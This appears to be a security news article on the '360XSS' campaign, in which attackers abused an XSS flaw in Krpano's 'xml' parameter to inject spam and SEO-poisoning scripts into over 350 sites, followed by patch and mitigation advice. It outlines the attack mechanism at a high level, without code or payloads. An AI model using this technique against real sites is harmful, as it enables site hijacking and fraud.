A cross-site scripting (XSS) vulnerability within the Krpano framework, a popular tool for embedding 360° images and creating virtual tours, has been exploited to inject malicious scripts into over 350 websites.
This widespread campaign manipulates search engine results and spreads spam advertisements across the internet.
Security researcher Oleg Zaytsev discovered the campaign, dubbed “360XSS,” after stumbling upon a suspicious ad on Google Search that was linked to a Yale University domain.
The ad led to a pornography site, raising Zaytsev’s suspicions and prompting him to investigate.
Zaytsev’s investigation revealed that the Yale University subdomain was running Krpano, and the vulnerability stemmed from the improper handling of the “xml” parameter in the URL.
This parameter, intended for specifying the location of external XML configuration files, could be exploited to inject malicious code.
The attackers used a specially crafted URL containing an XML parameter that redirected visitors to another website.
This website then executed a Base64-encoded payload via an XML document, ultimately injecting malicious scripts into the Krpano-powered site.
The injected scripts then served ads for various questionable products and services, including pornography, diet supplements, and online casinos.
In some instances, the hijacked pages were used to boost YouTube views. The scale of the campaign is massive, affecting a wide range of websites, including government portals, state government websites, universities, hotel chains, news outlets, car dealerships, and Fortune 500 companies.
Many of these sites attract millions of visitors each month, amplifying the reach of the malicious ads.
The vulnerability lies in a configuration setting called “passQueryParameters,” which, when enabled, allows HTTP parameters from the URL to be passed directly to the Krpano viewer.
While Krpano developers attempted to address this issue in version 1.20.10 by restricting “passQueryParameters” to an allowlist, explicitly adding the XML parameter back onto the allowlist re-introduced the XSS risk.
Zaytsev also discovered that Krpano’s own website, which hosts live examples of the 360° tour framework, was also vulnerable to the exploit.
The attackers are leveraging the trust and credibility of the compromised domains to achieve higher rankings in search results, a technique known as search engine optimization (SEO) poisoning.
By injecting malicious links and optimizing them with fake review counts and star ratings, the attackers ensure that their ads appear prominently in search results.
For example, the attackers managed to inject a fake article promoting online casinos directly into CNN’s website. Similarly, they targeted Pakistan’s largest news site, geo.tv, with the same tactic.
Following Zaytsev’s responsible disclosure, Krpano developers have released version 1.22.4. This version eliminates support for external configuration via the XML parameter, mitigating the risk of XSS attacks.
Krpano users are advised to update to the latest version and set the “passQueryParameters” setting to “false”. Website owners are also encouraged to use Google Search Console to identify and remove any infected pages.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free